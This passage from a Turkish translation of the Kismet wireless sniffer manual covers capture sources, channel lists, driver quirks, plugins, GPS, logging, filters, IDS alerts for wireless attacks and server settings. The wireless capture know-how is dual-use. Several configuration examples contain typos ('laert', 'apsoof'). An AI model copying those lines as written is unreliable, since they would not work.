satırı seçenekleri olarak “-c wlan0” gibi yazılarak da kullanılabilirler.
Wlan0 kanal 6'da yakalama yap ve kanal sekmesi olmasın
ncsource=wlan0,hop=false,channel=6
wlan0 da yakalama yap 802.11b kanalları 5GHz destekleyenler
ncsource=wlan0,channellist=IEEE80211b
wlan0 üzerinde wlan0mon adında bir VAP yarat ve wpa_supplicant
diğer kanallar hakkında bir görüntü verecek biçimde kullanılsın.
ncsource=wlan0,vap=wlan0mon,hop=false,wpa_scan=15
Daha önceden saklanmış pcap dosyasından oku:
ncsource=/home/foo/old_pcap
Windows üzerindeki Airpcap dosyasını yakala:
ncsource=airpcap
Uzaktaki capture_drone (yakalama asalağı) kullanarak yakala:
ncsource=drone,host=10.10.100.2,port=2502

Kanal Listesi
Kismet içindeki kaynak yakalama tarafından sekerek aranan kanalların
ve desenlerin listesidir. Kanallar otomatik belirlenemezse (ya da
kullanıcı bir nedenden onları değiştirmek isterse bu seçenek kullanılır.
Varsayılan kanal listesi (IEEE80211b, IEEE80211ab) sürücü tarafından
bir bir kanal listesi yoksa kullanılandır. Çoğu zaman da değiştirilmez.
Sürücünün desteklediği kanallardan yaratılan kanal listesi olunca,
“preferredchannels=seçenek” hangi kanallara ek zaman
harcanacağını belirtir. Varsayılan olarak bilinen kanallara (1, 6, 11 gibi)
bu ayarı yapmak, ya da bilinen ağlardaki kanallar (durağan olarak
kurulanlar) için Kismet daha çok bilgi toplamak için biraz daha uzun
zaman harcar. Daha karmaşık kanal zamanlaması için kanal listesi
konusunu biraz daha okuyun.
Kanallar tipik olarak (11, 36 gibi IEEE kanalları olabilir) ya da
2401,5200 gibi frekanslar gibi olabilir. Ama bazı platformlar ve
sürücüler kanalları ya da IEEE standart sınırları dışındaki frekansları
belirlemeyi desteklemezler.
channellist=ad:kanal.kanal,kanal
Ek olarak listedeki her bir kanal ağırlıklı olabilir ki onlar üzerinde dha
çok zaman harcanır. Ağırlık değeri 3 is 3x daha çok zaman kanalda
harcanır.
channellist=foo:1:3,6:3,11:3,2,3,4,5,6,7,8,9,10
256 tane kanal kanal listesinde tanımlanabilir. Daha çok kanal
olduğunda aly ve üst sınırdan oluşan aralıklar tanımlanabilir.
Aralıklar kanal ya da frekanslarla tanımlanabilir.
channellist=ad:range-[başlama]-[bitiş]-[üst_üste_binen]-[tekrar_sayısı]
Başlangıç ve bitiş arasındaki tüm kanalların bilinen tekrar sayısında
Kismet üst üste binme varsa doğrudan sekme yapmaz.
channellist=foo:range-1-11-3-1
Aynı tür aralık 802.11 2.4GHz kanallarda ~20Mhz genişliğinde olunca
teknik olarak 22 ama 20 ek olur ve her biri 5Mhz aralıkla dizilir.
channellist=foo:range-2412-2462-20-5
Aralıklar kaynak arasında parçalanmış değildir. Çoklu kaynakların
sekmesi aynı kanal listesinde olabilir. Bu da bir aralık genişletilmiş

aralığı parçalamaz anlanıma gelir. Diğer bir deyimle kanal aralıkları tek
bir kanal tanımı gibi kabul edilir.
Bir kanal listesinde virgüllerle ayrılmış birden çok aralık tanımı
yapılabilir. Bu tanımlar kanallara karışık tanımlanmış olabilirler.
channellist=foo:range-1-11-3-1,36,52
6. Özel sürücüler için ihbar ve gariplikler
Mac80211 Genel (Linux):
Bu sürüm sırasında linux'deki mac80211 sürücüleri bayağı önemli bir
gelişme içindeydi. Bunun anlamı herhangi bir anda tuhaf davranışlar
sergiler ya da açık sözlülükle kırılabilirlerdi. Kullanıcıların son kernel
sürümüne geçmeleri teşvik edilir ve hata olursa compat-wireless arka
kapı paketi kullanmaları istenir.
Madwifi (Linux)
ath5k/ath9k kullanımı ile Madwifi kullanılmaz hale geldi (eskidi). Bu
sürücüler çoklu vap destekler, daha açıkçası mac80211 katmanında
bunu yaparlar. Özellikle eski tarihsel madwifi problemleri devam
etmez.
Madwifi kaynakları VAP olarak (ath0, mon0, vb) ya da kontrol arayüzü
(wifi0, wifi1 gibi) berlitilir. Ama eğer kontrol arayüzü tanımlanmışsa,
Kismet desteklenen kanalların listesini çekemez ve IEE80211b
kanallarının varsayılanlarına kalır.
Çoklu vap ve ilk vap yaratırken madwifi problemleri olmaya devam
eder Bu nedenle ilk vap yaratma kapatılmalıdır. Modül parametresi
“autocrate=none” ath_pcl yüklenirken tanımlanır. Eğer madwifi
monitor vap durduğunda, yaratıldıktan hemen sonra paketler rapor
edilir.
VAP'ların yönetim ve izlenmesi birleştirildi halde hala çok iti
çalışmamaktadır.
RT28xx (Linux)
Bu chip takımı için iki tane sürücü vardır. Kernel içi sürücü Linux-2.6.31
ile kullanılmaya başlanmıştır. Kismet ile iyi çalışır. Aslında kullanılması
en uygun sürücüdür. RT28xx sürücüsünü açık bırakmayı unutmayın.
Adımsal sürücüyü açmayın. O sürücü mac80211 tabanlı değildir.
Kernel dışı sürücüler mac80211 kontrollerine uymazlar. Ve bu sürücü
kullanıldığında otomatik belirleme yapılamaz (/sys altında geçerli bir
sürücü yaratamazlar) bu nedenle sürücü tipi elle “type=rt2870sta”
diye tanımlanmalıdır.

Bu sürücünün varsayılan adı “rausbX” ki bazı libpcap sürümleri için
hata bile kabul edilebilir ve cihazın adının değişmesi bile istenebilir.
rt73-k2s-wrtz (Linux)
Ağaç yapısı dışındaki rt73 sürücüsü aynı rt2870sta gibidir. Tipinin
“rt73” olarak belirtilmesi gerekir.
Bu sürücü de “rausbX” adını varsayılan olarak kullanır ve aynı hata
burada da söz konusudur.
WL (Linux, intel)
Broadcom kendi sürücülerinin ikili sürümünü WL olarak yayınlamıştır.
Bu sürücüler izleme konumunu gerçekleştiremez. Kismet bunları
otomatik tanımaya çalışır ve sonucu kullanıcıya iletir. Broadcom
kullanıcıları kernel içi b43 ve b43xx sürücülerini kullanmalıdır.
OTUS (Linux)
Atheros 80211n USB cihazı için bir sürücü çıkarttı. Ama bu sürücünün
izleme konumu desteği yoktu ve Kismet'le kullanılamıyordu. Ar9170
sürücü projesi bu kart için mac80211 kernel desteğini sundu ve
Kismetle çalışabilmektedir. Ar9170 wireless-git geliştirmesiyle
birleştirildi. Kernel içinde compat-wireless pakaetnde yer alacak.
Nokia ITT (Linux)
Kismet'in Nokia ITT ile ilgili herhangi bir değişikliğinde, Noka sistem
kontrol paneli bağlantı bölümünde tarama boşluğu sıfır yapılmalıdır.
Diğer tüm ağ bağlantılarından koparılmalı ama kablosuz ağ kalmalıdır.
Nokia sürücüleri çoğu zaman hatalı FCS paketleri döndürür. Nokia
kaynak satırında “fcs=true,validatefcs=true” olmalıdır. Aksi halde
hatalı paketlerden çoklu hata dolu ağlar üretilir.
Nokia cihazı doğru olarak otomatik tanıma yapamaz. “nokia770”,
“noka800”, “nokia810” ya da “nokiaitt” sürücü tipi olarak
tanıtılmalıdır. “nokiaitt” jenerik kaynak olduğundan her tür nokia
tabletiyle çalışabilir.
Orinoco (Linux)
Yeni firmware'deki izleme konumu problemleri nedeniyle Orinoco
kernel sürücüleri “yeni” “/modern” firmware sürümleri için izlemeyi
kapatmıştır.
Kismet cihazı kullanmak ister ama kullanıcıyı bunun .alışmayacağını
bildirerek uyarır. İzleme desteği modül parametresindeki
“force_monitor=1” ile başlatılabilir. Daha az sorunlu chip kümesi için
(hermes olmayan prism2 gibi) hostap kullanın (kernel içinde de var).

NDISWrapper (Linux)
NDIS-Wrapper sürücüsü Windows sürücülerini Linux ağ dizisine yükler.
Bu sürücüler izleme konumuna sahip değildir ve Kismet ile çalışmazlar.
Not: rndis sürücüleri ndiswrapper gibi değildir. Rndis sürücüleri özel
USN chip kümesi içindir ndiswrapper ile ilişkili değillerdir. Rndis
Kismet'le çalışır.
BSD (BSD Jenerik)
İzleme konumu için radiotap başlıklarıyla çalışan Kismet BSD Jenerik
alt yapısında çalışan kartlar için kaynak tipi “radiotap_bsd_ag”,
“radiotap_bsd_-a”, “radiotap_bsd_g” ve “radiotap_bsd” yazılırsa çalışır.
Kanal belirleme ve tip otomatik seçimi şu anda desteklenmemektedir.
ncsource=wl0:type=radiotap_bsd_ag
Windows (Jenetik)
Windows altında yalnız airpcap cihazı desteklenmektedir. Bu çok özel
bir donanım olup, Cace Technologies tarafından üretilmiştir. Eğer bir
tane satın almazsanız, veri yakalama yapamazsınız.
Airpcap sürücülerinde izleme konumu “public” (halka açıktır). Kismet
yalnız bu cihazla Windows altındayken veri yakalayabilir.
AirPcap (Windows)
Varsayılan olarak kernel ilk bulduğu airpcap cihazını açar. Çoklu
cihazların açılması söz konusudur (arayüzün tüm adını kullanarak bu
gerçekleşir. AirPcap araçları arasında vardır desen \\.\airpcapXX). İlk
cihaz \\.\airpcap00, ikincisi \\.\airpcap01 ve bunun gibi...
USB Cihazları (OSX)
Yalnız Airport IOKit sürücü cihazları OSX'de desteklenmektedir. USB
cihazları genelde desteklenmez, çünkü sürücülerin izleme konumları
yoktur.
7. Desteklenen kaynak yakalama
Yakalanan kaynak tipleri Kismet otomatik olarak belirleyemezse gereklidir.
Linux Kaynak yakalamaları:
Tüm modern Linux sürücüleri mac80211 sürücü ana yapısını kullanır.
Kismet bu altyapıyı kullanan tüm sürücüleri otomatik olarak belirler.
Jenerik kaynak adı “mac80211” bir türü zorunlu yapmak için
kullanılabilir. Ama her zaman bunu yapmak doğru olmayabilir.
adm8211
acx100
hostap
Kernel adm8211 sürücüsü
Kernel acx100 sürücüsü
Kernel prism2 sürücüsü

ipw2100
ipw2200
ipw2915
ipw3945
mac80211
madwifi
madwifi_a
madwifi_b
madwifi_g
madwifi_ag
nokia770
nokia800
nokia810
nokiaitt
pcapfile
rt2870sta
wl12xx
drone
Kernel Intel 2100 sürücüsü
Kernel Intel 2200 sürücüsü
Kernel Intel 2915 sürücüsü
Kernel intel 3945 sürücüsü
Jenerik mac80211 herhangi bir mac80211 için tüm
kaynakları yakalama
Madwifi/Madwifi-ng
madwifi eşdeğeri, varsayılan 802.11a kanalları
madwifi eşdeğeri, varsayılan 802.11b/g kanalları
madwifi eşdeğeri, varsayılan 802.11b/g kanalları
madwifi eşdeğeri, varsayılan 802.11abg kanalları
Nokia Maemo tabletlerinde Conexant-tabanlı sürücü
nokia770 eşdeğeri
nokia770 eşdeğeri
nokia770 eşdeğeri
Pcap-kalıplı önceden kaydetilmiş dosya
Kernel dışında adımlamalı rt2870 11n sürücü (yerine
kernel içindekini kullanın)
N900 için yamanmış wl12xx sürücüleri
http://david.gnedt.eu/blog/ adresinden yamanmış
sürücüleri kullanmalıdır, aksi halde otomatik belirlenir.
Uzaktan Kismet paket yakalaması, kaynağın yakalama
seçenekleri:
"host=..." ve "port=..." gerekenlerdir.
ncsource=drone:host=localhost,port=2502
BSD Yakalama Kaynakları
BSD paket yakalama kaynakları şu anda otomatik tanıma ve kanal
belirleme yapamaz.
BSD altında yakalama izleme konumu olan her hangi bir sürücüyle
olabilir (Standart BSD IOCTL kullanıyor olmalıdır. Böylece konum ve
kanal ayarı yapılabilir).
Yamalar/Ek BSD desteği kabul edilir
radiotap_bsd Jenerik BSD yakalama kaynağı,
Varsayılan 802.11b/g kanalları
radiotap_bsd_g Varsayılan 802.11b/g kanalları
radiotap_bsd_a Varsayılan 802.11a kanalları
radiotap_bsd_ag Varsayılan 802.11abg kanalları
pcapfile
drone
Pcap-kalıplı önceden kaydedilmiş dosya
Uzaktan Kismet paketleri yakalama.
Kaynak seçenekleri
"host=..." ve "port=..." gereklidir

Windows Yakalama Kaynakları:
Şu anda yalnız Airpcap cihazı, pcap dosyası ve drone'lar desteklenen
pşaformlarda çalıştırılıyorsa Windows altında kullanılabilmektedir.
Airpcap
Airpcap jenerik kaynak. Kanal aralıklarını otomatik bulur.
“airpcap” arayüzü ilk airpcap cihazını bulur (ncsource=airpcap).
Özel cihazları tanıtabilmek için ncsource=\\.\airpcap01 gibi
tanımlar kullanmak gerekir).
airpcap_ask
Var olan kaynakları listeler ve hangisini kullanacağınızı sorar.
Kismet kullanıcı arayüzüyle da kullanılmaz.
Pcapfile
pcap-kalıplı daha önceden kaydedilmiş dosya.
Drone
Uzaktaki Kismet paketlerini yakalama, kaynak seçenekleri
“host=...” ve “port=...” gereklidir.
OSX/Macintosh Kaynakları Yakalama:
darwin
Airport IOKit tarafından kontrol edilebilen her cihazın sürücüsü
OSX altında kullanılabilir. Varsayılan 802.11b/g kanallarıdır.
Pcapfile
pcap-kalıplı önceden saklanmış dosya
drone
Uzaktaki Kismet paketlerinin yakalanması, kaynak seçenekleri
“host=...” ve “port=...” gereklidir.
8. Eklenebilir program parçaları
Kismet eklenen program parçaları (plugins) Kismetin yapamadığı her şeyi
yapar. Bular gelişmiş log kayıtları, IDS uyarılarını ekleme, yeni yakalama
kaynaklarını tanımlama (bir ölçüdeki sınırlamalarla) ve Kismet kullanıcı
arayüzüne yeni özellikler eklemektir.
Ekleme programlar Kismet'in kaynak kodlarına derleme için erişmek isterler
(ve de ayar bilgilerine). Her Kismet sürümü değiştiğinde yeniden
derlenmeleri gerekir. Eğer Kismet svn kullananlardansanız, her çıkış
yaptığınızda ekleme programları yeniden yapmalısınız (rebuild).
Kismet'e bağlanan ekleme programlar (Kismet'in kaynak yoluna
açılan/taşınan üçüncü parti ekleme programlar) “make plugins” ile

derlenebilir. Ve kurulumu “make plugins-install” ya da “make pluginsuserinstall”
ile yapılır. Bu komutlar Kismet'in var olan kaynak kod yolunu
kullanarak ekleme programı otomatik olarak ayarlar. KIS_SRC_DIR çevre
değişkenin değeri Kismet kaynak program yolunu göstermelidir.
Kismet sunucusunun ekleme programları (yakalama ve log kayıtlarına
yazma işi) sistem boyutundaki ekleme program yolundan yüklenir
(varsayılanı /usr/local/lib/kismet/) ya da kullanıcının kismet ayarları yolundan
yüklenir (~/.kismet/plugins).
Kismet'i parçalama yetkisi açık olarak koştururken (Kismet_capture root
olarak kurulmuş) ekleme programlar yalnız Kismet sunucusu tarafından
yüklenir. Ve ekleme programlar “root” yetkisi içeren işlemleri yapamazlar.
Kismeti yetki parçalaması yapmadan çalıştırırsanız (root olarak) ekleme
programlar da root olarak çalışır. Bu da önerilmez.
Sunucu ekleme programları ayarlarda
allowplugins=true
varsa yüklenebilir.
İstemci ekleme programları varsayılan olarak /usr/local/lib/kismet_client
yolundan yüklenirler ya da ~/.kismet/client yolundan kullanıcıya özel
eklemeler olarak yüklenilirler.
Kismet kullanıcı arayüzünün ekleme programları yüklemek için bir
mekanizması vardır (ve başlanırken ekleme programlar otomatik olarak
yüklenecek biçimde tanımlanır). Bu işlem ekleme menüsü ögesiyle sağlanır.
Biz kez Kismet kullanıcı arayüzü eklemesi yüklendiğinde, sonra bu işlemden
vazgeçilemez. Yüklenmesini kaldırmak için eklemenin ayarları başlangıçta
yüklenmeyecek durumuna getirilir ve Kismet yeniden başlatılır. Ekleme
programlarını kullanıcı arayüzünde yüklenecek biçimde ayarlamak için
(otomatik hazırlanan listeden) ekleme programını seç ve Enter tuşuna basın.
Ekleme program ilgili pencere kapandığında yüklenmiş olacaktır.
Kismet sunucu ekleme programları kullanıcı arayüzünden oynanamaz. Ama
yüklenmiş eklemeler listelenebilir.
Eğer ekelem başlatma sorunlarına neden oluyorsa (başka bir Kismet ikili
koduna göre derlenmiş olabilir) Kismet işlemi durdurur ve hangi eklemeden
sorunun kaynaklandığını yazar. Eklemeler kurulum sorunlarına da neden
olabilirler. Eğer eklemeler yüklenirken program kırılırsa, eklemeleri kaldırın
ve yeniden test edin. Çoğu zaman Kismet çalışırken eklemeleri yeniden
derlemek bu sorunların aşılmasına yardımcı olur.

9. GPS
Kismet GPS cihazına bağlanabilir. Böylece yakaladığı ağın koordinatlarını
belirler. Bu bilgi PPI log açıklıdında pcap dosyasına kaydedilir. XML dosyasına
Kismap işlemi olarak yazılır. Kismet kaynağı ve varsa diğer üçüncü parti
araçlarla kaydedilir.
Kismet GPS arka plan programını “gpsd” kullanır ya da doğrudan GPS
birimindeki NMEA'dan tarar.
GPS Kismet sunucusu ayarlarından kontrol edilir. Yerel sistemde gpsd
kullanılması için ayarlarda:
gps=true
gpstype=gpsd
gpshost=localhost:2947
gpsmodelock=false
gpsreconnect=true
bulunmalıdır.
gpsreconnect
Eğer gpsd kırılırsa ya da Kismet bir biçimiyle bağlantısını kaybederse,
gpsreconnect ile yeniden bağlantı sağlanır. Gpsmodelock bazı
GPS/GPSd ilişkilerindeki kırılmalarda yararlı olabilir. Bu durumda GPS
geçerli bir bağdan söz edemez. “gpsmodelock=true” zorlanınca
Kismet GPS'in ikincil bir kilitlenmesi var diye bilir.
gpsd olmadan GPS cihazı kullanımı
gps=true
gpstype=serial
gpsdevice=/dev/ttyS0
gpsreconnect=true
gpsdevice parametresi doğru düzgün bir sıralı (serial) cihaza
atanmalıdır. USB GPS cihazları için bu tipik olarak /dev/ttyUSB0 ve
blutooth cihazlar için /dev/rfcomm0 ya da benzeri olabilir. Cihazı
bağladıktan sonra “dmesg” çıktısına bakın ve hangi seri bağlantının
atandığını görün.
Kismet bir ağın yerini bilemez, bir sinyali bulduğu yerini bildirebilir. O
noktanın çevresindeki çemberde daha çok GPS verisi alırsanız o zaman ağı
merkezini belirlersiniz.

Kismet ağ yerinin ortalamasında çalışır. Ama bu da çok doğru değildir.
Ortalama ve kayan noktalı aritmetik hatası nedeniyle yer fazla güvenilir
olmayabilir. Ağların yerini grafiksel olarak gösterebilmek için GPSXML
dosyası kullanılmalıdır.
10. Kayıt altına alma (Logging)
Kismet pcap dosyasına loh kayıtlarını yazar. Gps, uyarılar ve ağ bilgileri XML
ve düz metin dosyalarında bulunur.
Varsayılan olarak, Kismet her paket başlığı olan PPI ile pcap dosyalarına log
kayıtlarını yazar. PPI başlığı iyi dokümante edilmiş başlık olup Wireshark
tarafında da desteklenir ve diğer araçlar, spektrum verilerini içerir, radio
verlerini sinyal ve gülütlü düzeylerini ve GPS verilerini içerir.
PPI yalnız yeni libpbap sürümünde vardır. Olmadığı zaman Kismet standart
802.11 kalıbına göre kayıt üretir (ek başlıklar olmadan).
Pcap log kalıbını kontrol edecek parametreler şunlardır:
pcapdumpformat=ppi
ya da
pcapdumpformat=80211
Log dosyalarının adlandırılması “logtemplate” ayar seçeneğidir. Varsayılan
olarak Kismet gelende kendi başladığı yolda log kayıtlarını bulundurur (“--
logprefix” ile değiştirilmediği sürece).
Aşağıdaki değişkenler logtenplate içinde kullanılabilir.
%p Ön ek ( --log-prefix de belirtildiği gibi)
%n Log adı ( --log-title' da belirtildiği gibi)
%d Başlangıç günü Mmm-DD-YYYY
%D Başlangıç tarihi YYYYMMDD
%t Başlangıç zamanı HH-MM-SS
%i Arttırımlı, aynı adlı birden çok log olduğunda
%l Log tipi (pcapdump, netxml, vb)
%h Kismet kullanıcısının ev yolu
Varsayılan log şablonu “--log-prefix” ya da /tmp ve “--log-title” olduğunda
aşağıdaki kalıba göre hazırlanır:
logtemplate=%p%n-%D-%t-%i.%l
örnek dosya:
/tmp/Kismet-20090428-12-45-33-1.pcapdump

İç içe dosya yolları tanımlayabilirsiniz (örneğin bu şablona göre “%p/%l/%D-
%t"). Ama tüm bunlar Kismet başlamadan önce yaratılmış olmalıdır. Kismet
bu yolları kendisi yaratmaz.
Bir çok kullanıcı log şablonları değiştirmek gereği duymaz. Ama seçenek
vardır. Şablonu değiştirirken mantıklı bir yerde (şablonun başında olabilir)
“%p” “prefix” seçeneğini koymayı unutmayın. Yoksa “--log-prefix” seçeneği
istenildiği gibi çalışmaz.
11. Filitreleme
Kismet temel elemeyi destekler. Ağlar izlemenin dışta kalır, pcap log yazma
ya da genel log yazma hep BSSID'ye, kaynağa ya da MAC adresine dayanır.
Elemeler açıldığında “positive-pass” (uyan geçer) türüdür. Elemeye uyan her
şey geçer ama diğerleri engellenir. Ağlardan yalnız BSSID
AA:BB:CC:DD:EE:FF olan paketleri işlemek için:
filter_tracker=BSSID(AA:BB:CC:DD:EE:FF)
yazılır. Bu özellik “!” operatörü kullanılarak ters çevrilebilir.
Paketleri dışlamak için:
filter_tracker=BSSID(!AA:BB:CC:DD:EE:FF)
yazılır. Aynı filitrede birden çok MAC adresi dizilebilir. Örneğin
AA:BB:CC:DD:EE:FF ve 00:11:22:33:44:55: adreslerinden bilgi almamak için:
filter_tracker=BSSID(!AA:BB:CC:DD:EE:FF,!00:11:22:33:44:55)
yazılır. IP maskelemesindeki gibi MAC adresleri de maskelenir. Örneğin:
filter_tracker=BSSID(AA:BB:CC:00:00:00/FF:FF:FF:00:00:00)
Aynı biçimde SOURCE(...), DEST(...) ve ANY(...) paketleri filitrelemek için
kullanılabilen tanımlamalardır. Örneğin yalnız MAC adresi 11:22:33:44:55:66:
olanın paketlerini işlemek içn:
yazılır.
filter_tracker=SOURCE(11:22:33:44:55:66)
12. IDS ve Uyarılar
Kismet'te IDS işlevsellikleri de vardır. Durumu olmayan ve olan IDS için
katman 2 ve 3 kablosuz ağ saldırılarını sağlar. Kismet parmak izinde
(özellikle tek paketlik saldırılarda) ve eğilimlerde (beklenmedik sorgular,
düzensiz akışlar vb.) uyarı verir.

Başka araçlarla ilişkili olur tun/tab dışa taşıma kullanarak kablosuz trafiğinde
sanal ağ arayüzü oluşturur. “paket-omatic” ve Snort gibi araçlar bu dışa
çıkarılmış verileri kullanarak ek IDS işlevleri oluşturabilir.
Kismet IDS olarak duran olduğunda en etkin biçimde olur. En iyi sonuçlar için
sekme yapmayan bir kaynak birincil ağın kanallarında olmalıdır. Kismet'in
IDS işlevleri mobil ya da kanal sekmesi türü kurulumlarda (ve varsayılan
olarak ayarlıdır) ama duyarlık olmayabilir.
Uyarılar “alert=” ayar seçeneğiyle düzenlenir. İki tane zaman parametresi
vardır. Throttle ve Burst. Her zaman biriminde kaç tane uyarıya izin
verileceğini “throttle” belirler. “Burst” ise bir satırda kaç uyarı olabileceğini
bildirir. Örneğin:
laert=NETSUMBLER,5/min,1/sec
Burada saniyede 1 uyarıya izin verilir. Bir dakikada en çok 5 tane uyarı
olabilir.
Kismet aşağıdaki uyarıları destekler.
AIRJACSSID Parmak izi (kullanılmayan)
İlk 802.11 hack'leme araçlarındandı. Program başlamadan önce
SSID “airjack” yapılır. Bu uyarı artık kullanılmamaktadır.
APSPOOF Parmak izi
Geçerli MAC adres listesi SSID için “apspoof=” seçeneğiyle
verilir. Listedeki MAC adresleri dışında bir yerden sorgu olursa
uyarı üretilir. Bu karışık erişim noktalarını belirlemede de
kullanılabilir. Ya da Karma/Airbase gibi saldırılarda sorguların
tümüne yanıt verir.
“apspoof=” ayar seçeneği özellikle SSID'si aynı olanları seçer.
SSID tek, çoklu, maskeli MAC adresleri olabilir.
apsoff=Foo1:ssidregex=”(?i:foobar)”,
validmacs=00:11:22:33:44:55
apsoof=Foo2:ssid=”Foobar”,
validmacs=”00:11:22:33:44:55,AA:BB:CC:DD:EE:FF”
Çoklu MAC adresi tanımlandığında tırnal içinde belirtilmelidir.
Kurallı deyim (regular expression) için “man pcrepattern”
belgesine bakın.

BSSTIMESTAMP Trend/Stateful
Geçersiz/sırala dışı türü BSS zaman damgası Erişim Noktasının
(AP) sahte olduğunu gösterir. Erişim noktasında oynayan BSS
zaman damgası varsa, şeytani bir ikizi var anlamına gelebilir ve
sahtecilik saldırısı vardır. Araçlar zaman damgasını uyumlu
yapmaya çalışmadığından bu tür saldırıyı çözebilmek kolay
değildir. Bazı erişim noktaları BSS zaman damgasını düzenli
olarak yeniden başlatabilir. (Referans WVE-2005-0019)
CHANCHANGE Trend/Stateful
Daha önceden belirlenen bir erişim noktası sürekli kanal
değiştiriyoorsa, aldatma saldırısı yapılıyor demektir. İstemcileri
yeni kanal üzerinden sahte erişim noktasına çeken saldırgan
bilgi toplama amacındadır.
CRYPTODROP Trend/Stateful
Erişim noktasını daha az güvenli şifreleme seçeneğiyle aldatmak
istemcileri kandırabilir ve bağlanmalarını sağlar. Bunun
olabilmesi ancak AP (erişim noktası) yeniden ayarlanacaksa
anlamlı olur.
DEAUTHFLOOD Trend/Stateful
BCASTDISCON Trend/Stateful
Saldırgan iletişimi kesimiş ve yetkisiz paketlerle kandırarak
istemcinin ağdan bağlantısını koparır, “denial-of-service” (servis
reddi) yaratır. Bu da saldırgan paketleri gönderinceye kadar
sürer.
http://802.11ninja.net
http://home.jwu.edu/jwright/papers/l2-wlan-ids.pdf
DHCPCLIENTID Fingerprint
İstemci tanıtım kodu taşıyan DHCP DISCOVER paketi gönderen
bir istemci paketin kaynak MAC adresiyle aynı değilse “DHCP
denial-of-service” (DHCP servis reddi) yanıtı alır.
DHCPCONFLICT Trend/Stateful
DHCP adresi alan istemciler farklı bir IP adresi kullanmaya
devam ederse aldatmacı istemci olduğuna karar verilebilir.
DISASSOCTRAFFIC Trend/Stateful
Ağdan bağlantısı kesilen istemci hemen veri alış verişine
girmemelidir. Çünkü bu durum aldatmacı saldırganın var olduğu
gösterebilir ve ağa doğru olmayan veriler sokuyordur. Ya da
istemci “denial-of-service” (servis reddi) saldırısına uğramıştır.

DISCONCODEINVALID Fingerprint
DEAUTHCODEINVALID Fingerprint
802.11 tanımları bağlantının kopmasına ya da yetkisizliğe ait
geçerli hata kodlarını sıralar. Bazı istemci ve erişim noktası
sürücüleri geçersiz/belirsiz hata kodlarını düzggün
yorumlamadıkları rapor edilmiştir.
DHCPNAMECHANGE Trend/Stateful
DHCPOSCHANGE Trend/Stateful
DHCP ayarlama protokolü istemcilerin isteğe bağımlı olarak
bilgisayar adı ve DHCP istemci üreticisi/işletim sistemi gibi
bilgilerini DHCP arama paketine ekler. Bu değerler ancak istemci
değişiklik yaparsa (ikili işletim sistemi kullanıyorsa) değişebilir.
Aksi halde değişiklik istemciye MAC adres klonlaması saldırısı
yapılmış demektir.
LONGSSID fingerprint
802.11 özelliklerinde SSID için en çok 32 bayt uzunluk
tanımlanır. Daha fazla SSID bir saldırının habercisidir.
LUCENTTEST Fingerprint (Kullanılmıyor)
Eski Lucent Orinoco kartları bazı tarama denemelerinde
belirlenebilen paketler yaratır.
MSFBCOMSSID Fingerprint
Windows Broadcom kablosuz sürücülerinin bazı sürümlerinde
SSID doğru düzgün ele alınmaz. 802.11 özelliklerinde yer alan
DDID uzunluğundan fazla olan SSID'lerde sistem kodu
çalıştırmaya çalışır. Bu sorun Metaspoit tarafından saptanmıştır.
MSFDLINKRATE Fingerprint
Wİndows D-LINK sürücülerinin bazı sürümlerinde çok uzun
802.11 geçerli oran alanlarını doğru düzgün ele alamaz.
Metasploit altyapısı tarafından bulunmuştur.
MSFNETGEARBECON Fingerprint
Windows netgear kablosuz sürücülerinin bazı sürümleri çok
büyük beacon çerçevelerini doğru düzgün ele alamaz ve sistemi
kod çalıştırmaya götürür. Bu sorun Metasploit tarafından
belirlenmiştir.
NETSTUMBLER Fingerprint (Kullanılmıyor)
Netstumbler'in eski sürümleri (3.22, 3.23. 3.30) bazı durumlarda
özel paketler üretir.

NULLPROBERESP Fingerprint
SSID'sinde IE işaretli 0 uzunluktaki parçalar sorgu ve yanıt
paketleri eski kartlarda (prism2, orinoco, airport-classic) hata
verir.
PROBENOJOIN Trend/Stateful
Aktif tarama araçları (Netstumbler gibi) sürekli ağ bulma
mesajları gönderir ama yanıt veren ağlara hiç bir zaman
bağlanmaz. Bu uyarı ileri düzeyde hatalılar olur ve kanal
sekmeleri varsayılan olarak engellenir.
13. Sunucu Ayar Seçenekleri
Kismet iki ana işleme bölünmüştür. Kismet sunucusu ve kismet istemcisi.
Sünücü bölümü (yakalama, log kayıtlarına yazma ve çözümlemeden
sorumludur) kismet.conf ayar dosyasıyla kontrol edilir (varsayılan olarak yeri
/usr/local/etc altındadır) ve istemci ise program içindeki Özellikler/Araçlar
seçeneği ile kontrol edilir.
Çoğu zaman Kismet kullanıcı arayüzü ile ek ayar gerektirmeden çalışır. Ama
yalnız çalışılan durumlarda ya da gelişmiş ayarlarda kullanıcı dosyayı
değiştirmek isteyebilir.
Kismetin ayar dosyası sıradan düz metin dosyasıdır. İçinde “seçenek=değer”
ikilileri vardır. # ile başlayan satırlar açıklama olarak kabul edilir.
Bir çok ayar seçeneği kendini anlatabilen türdendir ya da ayar dosyasında
açıklaması vardır.
Varsayılan olarak Kismet yalnız “loopback” arayüzünün 2501 kapısını izler
(ifconfig altında lo seçeneği)
listen=tcp://ip:port
Kismet'in dinleyeceği IP ve kapı numaralarını tanımlar.
Varsayılan olarak güvenlik nedeniyle yalnız 127.0.0.1 IP
numarasını “loopback” arayüzünden izler. Her hangi bir IP'yi
izlemek isterseniz 0.0.0.0 girin.
Allowedhosts=...
Virgülle ayrılmış IP adresleri listesi Kismet sunucusuna
bağlanabilir. IP aralığı ağ madkeleriyle anlatılabilir (örneğin
10.10.10.0/24 gibi).
maxclients=N
Kismet sunucusuna aynı anda bağlanabilecek istemci sayısı bu
seçenekte tanımlanır.

Maxbacklog=5000
Ağ protokolü ile uyumlu olmayan istemciler için sunucunun
bellekte saklayacağı log satırlarının üst sınırıdır. Bu Kismet
tarafından kullanılan RAM (bellek) boyunu da etkiler. Bellek
sorunu olan sistemlerde değer azaltılmalıdır.
Kismet sunucuları Kismet asalağı gibi çalışacak biçimde ayarlanabilir. Dışa
verilen mesajlar akan canlı TCP paketlerine çevirir.
dronelisten=..
Aynı yukarıdaki gibi ama bukez asalak özellikleri için.
droneallowedhosts=.. ...
dronemaxclients=.. ...
droneringlen=65535
Kismet istemcileri için en çok bellekte saklanacak log kayıtları
sayısına eşdeğerdir. Bellek sorunu olan sistemlerde sayı
azaltılabilir.
Kismet paketleri sanal ağ arayüzü ile diğer araçlara çıkartır (Linux'da
desteklenir, düşük düzeyde OSX ve BSD desteği sınırlı tuntap sürücü
uygulamasından kaynaklanır)..
tuntap_export=true tuntap desteğini aç
tuntap_device=kistap0 Sanel Ağ arayüzü yaratıldı
Kismet WEP anahtar değeri bilinen WEP ağlarının kayıtlarındaki şifresini
çözer.
